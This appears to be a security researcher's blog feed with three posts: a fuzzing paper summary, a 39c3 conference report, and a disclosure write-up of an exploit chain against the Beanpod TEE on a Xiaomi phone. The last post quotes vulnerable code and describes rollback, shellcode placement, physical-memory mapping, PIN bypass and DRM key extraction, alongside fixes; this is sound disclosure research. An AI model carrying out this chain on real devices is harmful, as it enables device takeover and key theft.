<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom"><title>Random ramblings of a security nerd</title><link href="/blog/" rel="alternate"></link><link href="/blog/feeds/all.atom.xml" rel="self"></link><id>/blog/</id><updated>2026-02-26T19:05:00-05:00</updated><entry><title>Sysyphuzz: the pressure for more coverage</title><link href="/blog/2026/0226-sysyphuzz.html" rel="alternate"></link><published>2026-02-26T19:05:00-05:00</published><updated>2026-02-26T19:05:00-05:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2026-02-26:/blog/2026/0226-sysyphuzz.html</id><summary type="html">&lt;p&gt;Fuzzing faces a key challenge: after running for an extensive time, coverage
plateaus and will no longer increase despite extensive mutations. Only new
seed inputs or mutation operators will likely change that. We have observed
that Syzbot fuzzing of the Linux kernel has essentially plateaued due to
Google's multi-year …&lt;/p&gt;</summary><content type="html">&lt;p&gt;Fuzzing faces a key challenge: after running for an extended time, coverage
plateaus and no longer increases despite extensive mutation. Only new
seed inputs or mutation operators are likely to change that. We have observed
that Syzbot fuzzing of the Linux kernel has essentially plateaued due to
Google's multi-year fuzzing efforts.&lt;/p&gt;
&lt;p&gt;Instead of blindly rerunning campaigns with slightly adjusted operators, we
wondered if we could find bugs in already-covered areas. We observed that the
execution frequency of basic blocks is heavily skewed: some basic blocks are
executed extremely frequently while many are executed rarely, if at all. On average,
basic blocks are executed fewer than 30 times. Our goal was therefore to balance
the execution frequency of basic blocks by boosting under-fuzzed areas. Our
intuition is that bugs are hiding in these under-fuzzed areas.&lt;/p&gt;
&lt;p&gt;Two key challenges when boosting under-fuzzed areas are (i) resource constraints
and (ii) context-destroying mutations. First, adding new fuzzing tasks diverts
energy from other areas, and blindly iterating on seeds that do not produce new
findings simply wastes energy. Second, these under-fuzzed basic blocks are hard
to reach and often require precise system call sequences. Mutations therefore
often destroy the context and make the target unreachable.&lt;/p&gt;
&lt;p&gt;Sysyphuzz runs in two phases: first, we replay the existing corpus during a
warm-up phase to get approximate counts of under-fuzzed areas. During this time
we simply count basic block execution frequencies and build a map
between basic blocks and seeds. In the second phase, we introduce a boost
delegator that tracks the frequency of basic blocks to decide which ones should be
boosted. During boost tasks, Sysyphuzz checks that the target basic blocks
remain reachable and then issues context-preserving mutations.&lt;/p&gt;
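&lt;p&gt;As a rough illustration (not the actual Sysyphuzz code; all names and the
selection policy below are our simplified stand-ins), the warm-up counting and
the boost delegator's target selection could look like this:&lt;/p&gt;

```c
/* Simplified sketch of Sysyphuzz's two phases: count basic block
 * execution frequencies during corpus replay, remember which seed
 * reached each block, then pick the rarest reached block to boost.
 * Names and the selection policy are illustrative stand-ins. */
enum { NBLOCKS = 8 };

typedef struct {
    unsigned long hits[NBLOCKS];  /* execution frequency per basic block */
    int seed_for_block[NBLOCKS];  /* a seed id known to reach each block */
} coverage_map;

/* Warm-up phase: replay one seed's trace and record frequencies. */
static void record_trace(coverage_map *m, int seed_id,
                         const int *trace, int len) {
    for (int i = 0; i != len; i++) {
        m->hits[trace[i]] += 1;
        m->seed_for_block[trace[i]] = seed_id;
    }
}

/* Boost phase: return the reached block with the lowest hit count;
 * its mapped seed is then mutated with context-preserving operators.
 * Blocks with zero hits need entirely new seeds, not boosting. */
static int pick_boost_target(const coverage_map *m) {
    int best = -1;
    for (int b = 0; b != NBLOCKS; b++) {
        if (m->hits[b] == 0) continue;
        if (best == -1 || m->hits[best] > m->hits[b]) best = b;
    }
    return best;
}
```

&lt;p&gt;The real system additionally verifies that the mapped seed still reaches the
target block before spending boost energy on it.&lt;/p&gt;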
&lt;p&gt;&lt;img alt="sysyphuzz" src="/blog/static/2026/0226/sysyphuzz.png" /&gt;&lt;/p&gt;
&lt;p&gt;The &lt;a class="reference external" href="https://github.com/HexHive/Sysyphuzz"&gt;sysyphuzz implementation&lt;/a&gt; is open
source, and we carefully evaluated it against syzkaller. The exact evaluation
details are in the &lt;a class="reference external" href="https://nebelwelt.net/files/26NDSS.pdf"&gt;paper&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The key takeaway of Sysyphuzz is that, after plateauing, fuzzers can still find
bugs when focusing on under-fuzzed areas. For this, we need to track seeds that
reach certain areas and carefully boost them.&lt;/p&gt;
&lt;p&gt;This work was led by Zezhong Ren during his visit to the lab, along with Han
Zheng, Zhiyao Feng, Qinying Wang, Marcel Busch, Yuqing Zhang, and Chao Zhang.
Zezhong deserves the majority of the credit for the hard work on the system, the
evaluation, and the revision.&lt;/p&gt;
</content><category term="Academia"></category><category term="fuzzing"></category><category term="kernel"></category><category term="NDSS"></category></entry><entry><title>39c3: Master reset in Hamburg</title><link href="/blog/2025/1230-39c3.html" rel="alternate"></link><published>2025-12-30T19:22:00-05:00</published><updated>2025-12-30T19:22:00-05:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2025-12-30:/blog/2025/1230-39c3.html</id><summary type="html">&lt;p&gt;Another year, another CCC. As every year, I went to Hamburg to appreciate all
galactic life forms in their diverse multi-dimensional environment. My goal this
year was the usual meet ups with friends I haven't seen in a long time, get
inspired for new research directions, to catch some talks …&lt;/p&gt;</summary><content type="html">&lt;p&gt;Another year, another CCC. As every year, I went to Hamburg to appreciate all
galactic life forms in their diverse multi-dimensional environment. My goals this
year were the usual: meet up with friends I haven't seen in a long time, get
inspired for new research directions, catch some talks, and, ideally, play a
bit of CTF if there was time.&lt;/p&gt;
&lt;p&gt;This year, we also had a talk on the first day, so quite a bit of time went into
preparing and rehearsing. Luckily, the talk went smoothly and we had a lot of time
afterwards to achieve all the other goals.&lt;/p&gt;
&lt;p&gt;The congress is a bit like coming home. Every year I feel incredibly welcome.
There's lots of blinking lights, diverse music playing, a few bars with Mate,
coffee, and beers along with enough time to chat, explore, and hack. The
congress is a way for me to recharge and get ready for the next year.&lt;/p&gt;
&lt;p&gt;I have two hearts beating in me. The first is an academic that tries to improve
security at a global scale by developing new techniques and analyzing
weaknesses. The other is a hacker that is driven by the curiosity of how systems
tick. At the congress, I can live the hacker heart.&lt;/p&gt;
&lt;p&gt;As last year, a bunch of my group explored the congress alongside me, and it was
also great to meet a few former HexHivers.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image0" src="/blog/static/2025/1230/congress.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;As every year, I attended a few talks and, given the 14,000 attendees, did
not make it into the rooms for some of the others. The rest of the blog
post highlights some of the amazing talks and gives a small summary.&lt;/p&gt;
&lt;div class="section" id="day-1-quality-talks"&gt;
&lt;h2&gt;Day 1: Quality Talks&lt;/h2&gt;
&lt;p&gt;&lt;a class="reference external" href="https://media.ccc.de/v/39c3-liberating-bluetooth-on-the-esp32"&gt;Liberating Bluetooth on the ESP32&lt;/a&gt;:
Anton reversed the proprietary BT stack for the ESP32 and liberated it, now
allowing an open source implementation that gives developers direct access to
low-level traffic, per-channel scans, arbitrary BT RF traffic, and lots of low-level
features that are otherwise hidden behind the HCI stack.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://media.ccc.de/v/39c3-opening-pamdora-s-box-and-unleashing-a-thousand-paths-on-the-journey-to-play-beatsaber-custom-songs"&gt;Opening pAMDora's box and unleashing a thousand paths on the journey to play
Beatsaber custom songs&lt;/a&gt;:
thimstar presents a wild story on glitching AMD CPUs to tease out internal ARM
cores, extracting boot ROMs and trying to get code execution way before the x86
cores start to execute. Extremely interesting deep dive into glitching, mod
chips, and the exploration of the dark arts.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://media.ccc.de/v/39c3-of-boot-vectors-and-double-glitches-bypassing-rp2350-s-secure-boot"&gt;Of Boot Vectors and Double Glitches: Bypassing RP2350's Secure Boot&lt;/a&gt;
stacksmashing and nsr give an overview of the Raspberry Pi RP2350 processor
that combines a nice ARM core and a RISC-V core with glitch detection, one-time
programmable memory, and a bunch of other security features at an unbeatable
price point of $1. They discuss the results from the bug bounty, covering attacks on
the OTP PSM, forcing a vector boot, laser fault injection, an OTP read double
glitch, and FIB antifuse extraction to read the 16-byte secret hidden in the OTP
memory.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://media.ccc.de/v/39c3-to-sign-or-not-to-sign-practical-vulnerabilities-i"&gt;To sign or not to sign: Practical vulnerabilities in GPG &amp;amp; friends&lt;/a&gt;: 49016 and
Liam presented some of their research into GPG signature verification. During
the talk, they demonstrate a few issues with signature parsing along with
violating signature checks, wrong signatures and even a few memory corruptions.
Apart from the awesome vulnerabilities, this talk highlights some of the issues
with old open source projects. Many of these projects have strong leaders that
struggle with assessing security issues. Liam and 49016 had a hard time
convincing the maintainers to assign CVE numbers despite being able to fake
signatures.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://media.ccc.de/v/39c3-escaping-containment-a-security-analysis-of-freebsd-jails"&gt;Escaping Containment: A Security Analysis of FreeBSD Jails&lt;/a&gt;:
ilja and Michael Smith target a slightly different angle this year and look at
FreeBSD jails, in particular the remaining attack surface of the kernel and
how to abuse it to break out of the jails. By enumerating the attack surface and
thoroughly exploring it they found several severe bugs. An interesting
observation was that there are still quite severe memory corruption
vulnerabilities in the FreeBSD kernel. This was somewhat surprising compared to
Linux, whose kernel is thoroughly fuzzed through syzkaller.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://media.ccc.de/v/39c3-die-kanguru-rebellion-digital-independence-day"&gt;Die Känguru-Rebellion: Digital Independence Day&lt;/a&gt;:
Marc-Uwe Kling and Linus Neumann talked about digital independence and called
for digital sovereignty in a fun way. This talk, apart from the comedy aspect,
highlighted the need for Europe to create, manage, and deploy our own
independent services, ideally built on open source.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://media.ccc.de/v/39c3-not-to-be-trusted-a-fiasco-in-android-tees"&gt;Not To Be Trusted - A Fiasco in Android TEEs&lt;/a&gt;:
In our talk, we presented a chain of bugs that results in a full compromise of
the Beanpod TEE. I &lt;a class="reference external" href="/blog/2025/1227-fiasco.html"&gt;blogged about our talk earlier&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://media.ccc.de/v/39c3-hacking-washing-machines"&gt;Hacking washing machines&lt;/a&gt;
Hajo and Severin started looking into old broken washing machines from Miele and
B/S/H. After some exploration, they moved up to newer devices and reverse
engineered several of the newer connected systems and enabled interesting debug
features.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://media.ccc.de/v/39c3-bluetooth-headphone-jacking-a-key-to-your-phone"&gt;Bluetooth Headphone Jacking: A Key to Your Phone&lt;/a&gt;:
Dennis and Frieder presented their research on impersonating Bluetooth devices.
Their twist was essentially that they could read out the Bluetooth address and
keys by connecting to specific vendor chips to then take over sessions. They
highlighted the attack vector of the HFP (hands-free) profile, which allows attackers to
take calls and redirect them over Bluetooth to hijack second-factor validation.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="day-2-all-about-the-social-interactions"&gt;
&lt;h2&gt;Day 2: All about the social interactions&lt;/h2&gt;
&lt;p&gt;&lt;a class="reference external" href="https://media.ccc.de/v/39c3-don-t-look-up-there-are-sensitive-internal-links-in-the-clear-on-geo-satellites"&gt;Don't look up: There are sensitive internal links in the clear on GEO
satellites&lt;/a&gt;
Nadia and Annie expanded on their earlier research on unencrypted satellite
backend communication. They presented some new findings, including military
operations conducted in the clear. One of the difficulties that led to this
security breach is that users have no (legal) way to pentest this backend.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://media.ccc.de/v/39c3-xous-a-pure-rust-rethink-of-the-embedded-operating-system"&gt;Xous: A Pure-Rust Rethink of the Embedded Operating System&lt;/a&gt;:
bunnie and xobs presented their work on an embedded Rust operating system along
with the design of a microkernel. While the OS was pretty standard stuff, they also
presented a new RISC-V devboard that we got to play with. While bunnie only
spent a few slides on the technical details, I was impressed by how he
snuck a RISC-V chip alongside a fused-off ARM chip to save on royalty fees.&lt;/p&gt;
&lt;p&gt;The rest of the day, I spent mostly socializing and talking to other people in
different assemblies.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="day-3-a-few-more-talks"&gt;
&lt;h2&gt;Day 3: A few more talks&lt;/h2&gt;
&lt;p&gt;&lt;a class="reference external" href="https://media.ccc.de/v/39c3-build-a-fake-phone-find-real-bugs-qualcomm-gpu-emulation-and-fuzzing-with-libafl-qemu"&gt;Build a Fake Phone, Find Real Bugs: Qualcomm GPU Emulation and Fuzzing with
LibAFL QEMU&lt;/a&gt;:
Romain, who is still pushing on his PhD at EURECOM, tells us how to target
Qualcomm GPUs through a LibAFL driver on Android. This talk is a great
introduction to LibAFL usage and to writing fuzz drivers for
not-too-easily-reached targets, as well as to GPU fuzzing in general. And Romain
found lots of cool bugs, so definitely recommended.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://media.ccc.de/v/39c3-the-angry-path-to-zen-amd-zen-microcode-tools-and-insights"&gt;The Angry Path to Zen: AMD Zen Microcode Tools and Insights&lt;/a&gt;
Benjamin builds on earlier research reversing the AMD K8 and K10 microcode
and ports it to Zen. In this talk, he quickly introduced the concept of
microcode patching and discussed, at length, how he built an extensive toolchain
to create your own instructions.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://media.ccc.de/v/39c3-rowhammer-in-the-wild-large-scale-insights-from-flippyr-am"&gt;Rowhammer in the Wild: Large-Scale Insights from FlippyR.AM&lt;/a&gt;:
Martin, Florian, and Daniel gave an overview of Rowhammer and presented a
large-scale study of Rowhammer in the wild, where they distributed USB sticks to
thousands of participants and got them to run the code on their systems to test
for Rowhammer-flippable bits according to diverse patterns.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://media.ccc.de/v/39c3-von-fuzzern-zu-agenten-entwicklung-eines-cyber-reasoning-systems-fur-die-aixcc"&gt;Von Fuzzern zu Agenten: Entwicklung eines Cyber Reasoning Systems für die
AIxCC&lt;/a&gt;:
Mischa and Annika introduce the audience to fuzzing, LLMs, and how they are
used as part of a cyber reasoning system at the AIxCC. The goal of this DARPA
competition was to develop an end-to-end cyber reasoning system that not only
finds bugs and creates exploits but also patches them. They discussed the common approaches
used by the different teams along with some limitations. Great overview and
introduction into this topic.&lt;/p&gt;
&lt;p&gt;Gen.Polyb.io workshop: This year, there was a fun new game at the congress. One
could register a simple NFC card at a base station. After joining a faction,
one could &amp;quot;capture&amp;quot; other base stations, redirect energy, and gain points for
their team. This was a super fun treasure hunt to find all the different
stations and kept us up one night. On the third day, the developer of the
stations gave a workshop on how he built the system, what software was running,
and how to make it tamper resistant. Overall a cool insight into low level
hardware.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="departure"&gt;
&lt;h2&gt;Departure&lt;/h2&gt;
&lt;p&gt;On the last day, I grabbed a quick breakfast and headed towards the airport.
After a stroll through the harbor area, I did a quick stop to explore some
caches and then caught up with some emails at the airport.&lt;/p&gt;
&lt;p&gt;I'm sure that I missed many great talks but that's part of the congress
experience: you live in the moment and randomly pop into workshops and talks
while missing out on some others. Luckily, most talks are recorded and I'll be
able to catch up later, so let me know if I missed your favorite talk in my list
above.&lt;/p&gt;
&lt;p&gt;We'll be back next year with hopefully another talk, renewed energy, cool hacks,
and lots of time to talk to people. So long, see you next year at the congress,
and hack the planet!&lt;/p&gt;
&lt;/div&gt;
</content><category term="Conferences"></category><category term="security"></category><category term="congress"></category><category term="39c3"></category><category term="ccc"></category><category term="privacy"></category></entry><entry><title>Not To Be Trusted - A Fiasco in Android TEEs</title><link href="/blog/2025/1227-fiasco.html" rel="alternate"></link><published>2025-12-27T22:30:00-05:00</published><updated>2025-12-27T22:30:00-05:00</updated><author><name>Philipp Mao, Marcel Busch, Mathias Payer</name></author><id>tag:None,2025-12-27:/blog/2025/1227-fiasco.html</id><summary type="html">&lt;p&gt;Android has become a diverse, multi-faceted, and complex ecosystem. In our
research, we came across a Xiaomi Redmi Note 11S and wanted to get root. This is
our journey from unprivileged user-land to the most secure layer of Android
through a chain of three (or four) bugs as
&lt;a class="reference external" href="https://fahrplan.events.ccc.de/congress/2025/fahrplan/event/not-to-be-trusted-a-fiasco-in-android-tees"&gt;presented at …&lt;/a&gt;&lt;/p&gt;</summary><content type="html">&lt;p&gt;Android has become a diverse, multi-faceted, and complex ecosystem. In our
research, we came across a Xiaomi Redmi Note 11S and wanted to get root. This is
our journey from unprivileged user-land to the most secure layer of Android
through a chain of three (or four) bugs as
&lt;a class="reference external" href="https://fahrplan.events.ccc.de/congress/2025/fahrplan/event/not-to-be-trusted-a-fiasco-in-android-tees"&gt;presented at 39c3&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;img alt="threatmodel" src="/blog/static/2025/1227/threatmodel.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;In our chain, we assume that an attacker already has root access on the Android
device. This may be achieved through a malicious app giving them user-space
access and a kernel bug to escalate their privileges from the normal world
exception level 0 (N-EL0) to the normal world kernel (N-EL1). While the attacker
can already control other apps, ARM provides an even more privileged mode called
the &amp;quot;Secure World&amp;quot;. Android uses the secure world to protect private data,
cryptographic keys, and sensitive applications. We show how to get full
privileges at the highest exception level in the secure world through a chain of
three (or four) bugs.&lt;/p&gt;
&lt;div class="section" id="setup-get-root-or-die-trying"&gt;
&lt;h2&gt;Setup: Get root (or die trying)&lt;/h2&gt;
&lt;p&gt;To get access to debug logs and to control the kernel (as per our threat model),
we first have to get developer access. On the Xiaomi Redmi, this involves
setting up a cloud developer account, registering the device using a data SIM,
waiting for a week, and finally unlocking the device to get developer access.
While this is tedious, it's a straightforward process. While more and more OEMs
try to make this process as hard as possible, Xiaomi is actually one of the OEMs
that makes it comparatively easy.&lt;/p&gt;
&lt;p&gt;&lt;img alt="root" src="/blog/static/2025/1227/root.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;So we started with a COTS Redmi Note 11S and, after a week of waiting, we gained
developer access and root in the normal world. We don't have access to
the secure monitor (running at S-EL3) or the secure world (yet). Our applications can
interact with the secure world through the Global Platform API. The Secure World
is hidden and protected from the normal world (and the device owner).&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="bug-0-global-confusion"&gt;
&lt;h2&gt;Bug 0: Global confusion&lt;/h2&gt;
&lt;p&gt;We observe that MediaTek ships the &lt;tt class="docutils literal"&gt;keyinstall&lt;/tt&gt; trusted application by
default, which is then included on all Xiaomi devices. In an earlier version, we
reported a type confusion vulnerability
(&lt;a class="reference external" href="https://nvd.nist.gov/vuln/detail/cve-2023-32835"&gt;CVE-2023-32835&lt;/a&gt;). The essence of this bug is
a type confusion when calling &lt;tt class="docutils literal"&gt;query_drmkey_impl&lt;/tt&gt;, giving the attacker an
arbitrary write primitive in the TA through &lt;tt class="docutils literal"&gt;keytypes_out&lt;/tt&gt;:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
uint32_t query_drmkey_impl(keyblock_t *keyblock, ..., uint32_t *keytypes_out, ...) {
  keycount = keyblock-&amp;gt;keycount;
  curr_keyslice = (keyslice_t *) &amp;amp;keyblock-&amp;gt;keyslices[0];

  i = 0;
  do {
    memcpy(&amp;amp;keyslice_copy, curr_keyslice, KEYSLICE_SZ);

    keytype = keyslice_copy.keytype;
    keytypes_out[i] = keytype;

    key_slice_len = keyslice_copy.drm_key_size + KEYSLICE_SZ;
    curr_keyslice = (keyslice_t *)((char *)curr_keyslice + key_slice_len);
    i += 1;
  } while (keycount != i);
  [...]
&lt;/pre&gt;
&lt;p&gt;We published this &lt;a class="reference external" href="https://nebelwelt.net/files/24SEC4.pdf"&gt;GlobalConfusion&lt;/a&gt;
bug pattern in 2024 and disclosed all discovered vulnerabilities in TAs to the
respective vendors. MediaTek promptly fixed the bug and checks for correct type
usage in the updated version. The Global Platform consortium has also since
incorporated our suggestions to make the type check explicit.&lt;/p&gt;
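&lt;p&gt;The fix boils down to explicitly checking the caller-supplied parameter type
tag before interpreting the parameter as a buffer. A minimal sketch, with
simplified stand-ins for the GP TEE parameter layout (the constants match the
spec values, but the struct is not the real API definition):&lt;/p&gt;

```c
/* Hedged sketch of the GlobalConfusion fix: verify the GP parameter
 * type tag before treating the parameter as a memory reference.
 * The struct layout is a simplified stand-in, not the real GP TEE
 * Internal API definition. */
enum {
    TEE_PARAM_TYPE_VALUE_INPUT   = 1,
    TEE_PARAM_TYPE_MEMREF_OUTPUT = 6
};

typedef struct {
    unsigned type;       /* caller-supplied parameter type tag */
    void *buffer;        /* only meaningful for MEMREF types */
    unsigned long size;
} tee_param;

/* Return the buffer only when the type tag and size match; the
 * vulnerable TA skipped this check and trusted the pointer blindly. */
static void *checked_memref(tee_param *p, unsigned expected,
                            unsigned long need) {
    if (p->type != expected) return 0;  /* reject type confusion */
    if (need > p->size) return 0;       /* reject short buffers */
    return p->buffer;
}
```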
&lt;/div&gt;
&lt;div class="section" id="bug-1-rollback-attack"&gt;
&lt;h2&gt;Bug 1: Rollback attack&lt;/h2&gt;
&lt;p&gt;On many Android ecosystems, including RedMi, trusted applications are loaded
from the normal world into the secure world where they are executed. As, per the
threat model, the attacker controls the normal world, the loading must be
secured.&lt;/p&gt;
&lt;p&gt;Trusted applications are therefore signed and verified before they are
executed. While signatures guarantee authenticity, they do not guarantee freshness. As
bugs are fixed in trusted applications, old applications still carry a valid
signature. The trusted world must therefore implement some form of version counter
to ensure only the newest versions can be loaded.&lt;/p&gt;
&lt;p&gt;Unfortunately, the &lt;tt class="docutils literal"&gt;keyinstall&lt;/tt&gt; application has no rollback prevention.
Assuming root privileges in the normal world, we leverage a Magisk overlay to
provide the old (vulnerable) keyinstall trusted application and load it into the secure world
where we can exploit the previous bug.&lt;/p&gt;
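&lt;p&gt;Conceptually, rollback prevention only requires a persisted monotonic
counter that ratchets forward with every accepted version. A minimal sketch,
assuming a loader that persists one counter per TA (e.g., in RPMB or OTP); the
names are ours, not from the Beanpod TEE:&lt;/p&gt;

```c
/* Minimal sketch of TA rollback prevention: the loader persists a
 * monotonic minimum version per trusted application and refuses
 * anything older. Signature verification is elided; all names are
 * illustrative. */
typedef struct {
    unsigned stored_version;  /* persisted minimum acceptable version */
} ta_record;

/* Accept a TA only if its (signed) version is at least the stored
 * counter, then ratchet the counter so older TAs stay rejected. */
static int check_and_update_version(ta_record *rec, unsigned ta_version) {
    if (rec->stored_version > ta_version)
        return 0;                      /* rollback attempt: reject */
    rec->stored_version = ta_version;  /* monotonic ratchet */
    return 1;
}
```

&lt;p&gt;With such a ratchet in place, re-supplying the old vulnerable keyinstall
binary would simply be rejected at load time.&lt;/p&gt;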
&lt;/div&gt;
&lt;div class="section" id="pivot-1-code-execution-in-the-secure-world"&gt;
&lt;h2&gt;Pivot 1: Code execution in the secure world&lt;/h2&gt;
&lt;p&gt;By leveraging bug 0 and bug 1 above, we achieve an arbitrary write primitive in
the trusted application. On the RedMi beanpod TEE, trusted applications run in a
32-bit address space without ASLR. Our simple strategy to get code execution is
to search for an RWX page and hijack control flow. We first use our arbitrary write
primitive to scan for writable pages by iterating through memory. This gives us
a list of pages we have write access to. We then write a return instruction
(&lt;cite&gt;bx lr&lt;/cite&gt;) to such a page and overwrite a &lt;cite&gt;GOT&lt;/cite&gt; entry to branch to
our code gadget.&lt;/p&gt;
&lt;p&gt;After finding an &lt;cite&gt;RWX&lt;/cite&gt; page, we neatly place our shellcode there and get
convenient code execution as a user-space process in the secure world.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="bug-2-access-to-physical-memory"&gt;
&lt;h2&gt;Bug 2: Access to physical memory&lt;/h2&gt;
&lt;p&gt;While user space access is nice, we obviously want the highest level of
privileges. The Beanpod trusted execution environment runs the Fiasco L4Re
microkernel. In a microkernel environment, the kernel provides a minimal trusted
computing base that only manages essential tasks for process abstractions,
memory management, and inter-process communication (IPC). Processes get assigned
capabilities to communicate with other trusted processes that manage hardware or
other privileged tasks.&lt;/p&gt;
&lt;p&gt;As a first step, we therefore enumerated the capabilities that our compromised
keyinstall trusted application had. Interestingly, we have
the &lt;tt class="docutils literal"&gt;memory_client_*&lt;/tt&gt; and &lt;tt class="docutils literal"&gt;sst_client&lt;/tt&gt; capabilities. Reversing the
&lt;tt class="docutils literal"&gt;uTMemory&lt;/tt&gt; process, we discovered that it has the &lt;tt class="docutils literal"&gt;sigma0&lt;/tt&gt;
capability, allowing it to map any physical memory. Through this chain, from our
compromised TA through uTMemory to sigma0, we can now map arbitrary physical
memory, thereby gaining read/write access to all memory, including memory of the
secure monitor and other trusted applications.&lt;/p&gt;
&lt;p&gt;This bug essentially means game over for security and indicates a privilege
inversion. Through capabilities of our user space process, we are allowed to map
arbitrary physical memory into the address space of our process. This makes
further escalation a walk in the park.&lt;/p&gt;
&lt;p&gt;First lesson of compartmentalization: make sure your policy is tight and secure.
Don't hand out capabilities like candy, and make sure each application runs with
least privilege.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="bug-3-stack-smashing-as-a-detour"&gt;
&lt;h2&gt;Bug 3: Stack smashing as a detour&lt;/h2&gt;
&lt;p&gt;Now assuming that the Fiasco capabilities were not misconfigured and that
apps cannot map arbitrary physical memory, we would have to find a lateral path
through other apps, slowly escalating our privileges. Looking at our
capabilities, we have access to &lt;tt class="docutils literal"&gt;sst_client&lt;/tt&gt; which allows us to interact with
&lt;tt class="docutils literal"&gt;&lt;span class="pre"&gt;sst-server&lt;/span&gt;&lt;/tt&gt;. The sst-server app has access to memory_client, so this is a
juicy one-step target.&lt;/p&gt;
&lt;p&gt;Squinting at the sst-server and browsing through uses of &lt;cite&gt;memcpy&lt;/cite&gt;, we immediately
find a stack-based buffer overflow that gives us simple code execution. This
would have served as a fallback to gain &lt;tt class="docutils literal"&gt;memory_client&lt;/tt&gt; capabilities if the
capabilities were not broken in the first place.&lt;/p&gt;
&lt;p&gt;Second lesson of compartmentalization: applications with access to privileged
capabilities must be secured as they are an important attack surface. Attackers
may target them to get access to their capabilities or use them as confused
deputies.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="pivot-2-from-trusted-application-to-controlling-the-secure-world"&gt;
&lt;h2&gt;Pivot 2: From trusted application to controlling the secure world&lt;/h2&gt;
&lt;p&gt;Our goal is now to invoke code in the secure monitor from the normal world as
executing code there is much more convenient. Following our first pivot, we use
the new capabilities to map the physical memory of the secure monitor into the
address space of the trusted application we control.&lt;/p&gt;
&lt;p&gt;We patch one SMC handler in the secure monitor to execute our code
(namely the &lt;tt class="docutils literal"&gt;bootloader_smc_handler&lt;/tt&gt; that is likely unused after boot). To
make it callable from user space, we also overwrite the code of a system call
handler in the Linux kernel in the normal world (namely &lt;tt class="docutils literal"&gt;sys_quotactl&lt;/tt&gt;,
which is likely unused) to trigger the secure monitor &lt;tt class="docutils literal"&gt;smc&lt;/tt&gt; call through a
&lt;tt class="docutils literal"&gt;svc&lt;/tt&gt; call.&lt;/p&gt;
&lt;p&gt;&lt;img alt="sel3" src="/blog/static/2025/1227/sel3.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;With this chain, we now have a reliable way to trigger our shellcode in EL3.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="ftw-pin-bypass-and-drm-keys"&gt;
&lt;h2&gt;FTW: pin bypass and DRM keys&lt;/h2&gt;
&lt;p&gt;We now demonstrate our new privileges with an
arbitrary PIN bypass and by leaking DRM keys.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;PIN Bypass.&lt;/em&gt; Searching the physical address space for the PIN verification function running
in a trusted application, we locate the page with the corresponding code and
patch the function to return true. This makes the device accept any PIN and
tells user land that the login succeeded.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Leaking DRM keys.&lt;/em&gt; Using a similar primitive to scan physical memory, we
interact with a DRM provider and then locate and leak the device key.
Interestingly, this would allow us to emulate and rehost the DRM solution to
dump 4K streams (of movies we paid for).&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="parting-thoughts"&gt;
&lt;h2&gt;Parting thoughts&lt;/h2&gt;
&lt;p&gt;Apart from delivering an amazing hack and the first public
exploit chain for the Beanpod TEE, this research highlights the weaknesses of highly
compartmentalized systems. The TEE ecosystem is incredibly complex, and a chain
of mistakes allows an attacker to compromise the full ecosystem.&lt;/p&gt;
&lt;p&gt;&lt;img alt="paths" src="/blog/static/2025/1227/paths.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;When deploying compartmentalization, we must carefully assign capabilities based
on least privileges and secure exposed services by vetting them and deploying
mitigations. Also, the (trusted) app ecosystem should be carefully controlled,
allowing only the minimal number of apps possible.&lt;/p&gt;
&lt;p&gt;On our target device, we managed to escalate from N-EL0 to S-EL0 through a
rollback attack that allowed us to exploit a known type confusion vulnerability.
This initial foothold enabled us to enumerate capabilities and list dependency
chains. We then escalated from S-EL0 to S-EL3 by mapping arbitrary physical
memory due to a capability misconfiguration (but could alternatively have done
so by exploiting a stack-based buffer overflow in a slightly longer chain).&lt;/p&gt;
&lt;p&gt;&lt;img alt="fiasco" src="/blog/static/2025/1227/fiasco.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;Check out all details in &lt;a class="reference external" href="https://github.com/HexHive/beanpod_fiasco"&gt;the beanpod_fiasco repository&lt;/a&gt;, &lt;a class="reference external" href="https://media.ccc.de/v/39c3-not-to-be-trusted-a-fiasco-in-android-tees#t=2942"&gt;watch the recording of the talk&lt;/a&gt;,
or &lt;a class="reference external" href="https://nebelwelt.net/files/25CCC-presentation.pdf"&gt;check out the slides&lt;/a&gt;.
&lt;a class="reference external" href="https://hexhive.epfl.ch"&gt;Join us&lt;/a&gt; if you're interested in low level Android
research, compartmentalization, or just general mischief.&lt;/p&gt;
&lt;p&gt;Philipp deserves the main credit for &lt;a class="reference external" href="https://philippmao.github.io/writeups/beanpod/"&gt;writing the exploits&lt;/a&gt; and reversing the
